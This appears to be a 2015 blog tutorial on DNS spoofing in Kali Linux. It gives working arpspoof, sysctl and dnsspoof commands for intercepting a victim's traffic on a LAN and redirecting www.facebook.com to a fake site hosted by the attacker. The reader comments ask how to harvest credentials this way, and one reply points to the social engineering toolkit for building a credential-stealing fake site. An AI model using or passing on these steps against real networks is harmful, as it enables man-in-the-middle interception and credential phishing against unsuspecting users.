Sunday, 10 May 2015

Fake Website with DNS Spoofing in Kali Linux


DNS Spoofing is based on presenting fake DNS replies to a victim in response to their DNS request and, as a result, forcing them to visit a fake website.

In normal DNS communication, the client requests the IP Address of a particular website and the DNS Server responds back with the  IP address of that  website. The client then connects to the website through the IP Address it received as a response. With DNS Spoofing, the attacker intercepts the DNS request and sends out a response containing a spoofed IP address, before the reply from the real DNS server can reach the client.

Consider the following scenario:

Gateway: 192.168.122.1
Victim :    192.168.122.3
Attacker: 192.168.122.10

There is a LAN which is connected to the Internet through a router 'Gateway'. There is a machine 'Victim' on the LAN , which will access the Internet. There is a machine 'Attacker' on the LAN, which will launch a 'man-in-the-middle' attack (ARP Spoofing attack) against the 'Victim' and 'Gateway'. All communication between 'Victim' and 'Gateway' will pass through the 'Attacker'. For a detailed explanation on ARP Spoofing, refer to this post


How will the Attacker do this ?
 
'Attacker' will send the 'Victim' false ARP replies telling that it is 'Gateway'. And 'Attacker' will send the 'Gateway' false ARP replies telling that it is 'Victim'.
When 'Victim' requests the IP address of 'www.facebook.com' , 'Attacker' will intercept the request and respond to the DNS query ( before the actual response arrives)  with a spoofed address of '192.168.122.10' (the IP Address of the Attacker). 'Victim' will make a connection request to 192.168.122.10 and will end up visiting a fake website hosted on the 'Attacker' machine.


Perform the following steps on the 'Attacker' (Kali Linux) machine:

1) Configure ARP spoofing
  1.1) Tell the 'victim' that we are 'gateway'. Open a terminal window and type the below command:
     arpspoof -i eth0 -t victimIP gatewayIP

  1.2) Tell the 'gateway' that we are 'victim'. Open a terminal window and type the below command:
     arpspoof -i eth0 -t gatewayIP victimIP

  1.3) Enable IP Forwarding in the kernel. Open a terminal window and type the below command:
    sysctl -w net.ipv4.ip_forward=1

  1.4) Ensure that Forwarding is enabled in the Firewall. And verify that the firewall doesnot block any incoming or outgoing packets.


2) Configure DNS Spoofing
2.1) Create a file 'hosts.spoof' containing the name of the website and the spoofed IP Address.
     192.168.122.10           www.facebook.com

2.2) Open a terminal window and run the following command
     dnsspoof -i eth0 -f hosts.spoof

Now, whenever the 'Attacker' will intercept a DNS request for 'www.facebook.com', it will send a fake DNS reply containing it's own IP Address. The 'Client's' browser will now be redirected to a fake website hosted on the 'Attacker's' machine.

5 comments:

  1. how would you get the credentials once you've set this up?
    Thanks

    ReplyDelete
    Replies
    1. If you're using kali you can set up a fake website that will steal credentials in the social engineering toolkit

      Delete
  2. Hello

    How can this works in a wan network?

    Thanks

    ReplyDelete
  3. I have been trying this for a few days with lots of research. The victim is not being redirected. Any thoughts?

    ReplyDelete
  4. look up, it's complicated dude , i am having the same issue

    ReplyDelete